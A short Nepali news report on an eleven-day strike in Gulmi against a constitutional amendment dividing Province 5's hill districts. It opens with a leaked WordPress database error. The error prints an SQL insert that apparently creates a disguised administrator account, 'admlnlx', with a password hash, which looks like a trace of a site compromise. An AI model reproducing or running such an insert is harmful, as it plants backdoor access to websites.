WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR0GeQTIUdpYuxR2oJy73AtSmX6JnS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:41:40', '', 'admlnlx', 'admlnlx')
गुल्मी,मंसिर २५-
संबिधान संशोधनमा पाँच नम्बर प्रदेशका पहाडी जिल्ला टुक्राएको बिरोधमा गुल्मीमा ११ दिनदेखि बन्द आह्वान गरिएको छ ।जिल्लाको सदरमुकाम तम्घाससहित बलेटक्सार, रिडी, खैरेनी, शान्तिपुर, मजुवा, भुवाचिदी, वामीटक्सारका मुख्य बजारमा पनि बन्दकर्ताले बन्द गराउदै आएका छन् ।
जसका कारण जिल्ला सदरमुकाम तम्घासँगै ग्रामीण भेगका मुख्य बजार, कलकारखाना तथा जिल्लाबाट छुट्ने छोटो तथा लामो दुरीका सवारी साधन छुटेका छैनन् ।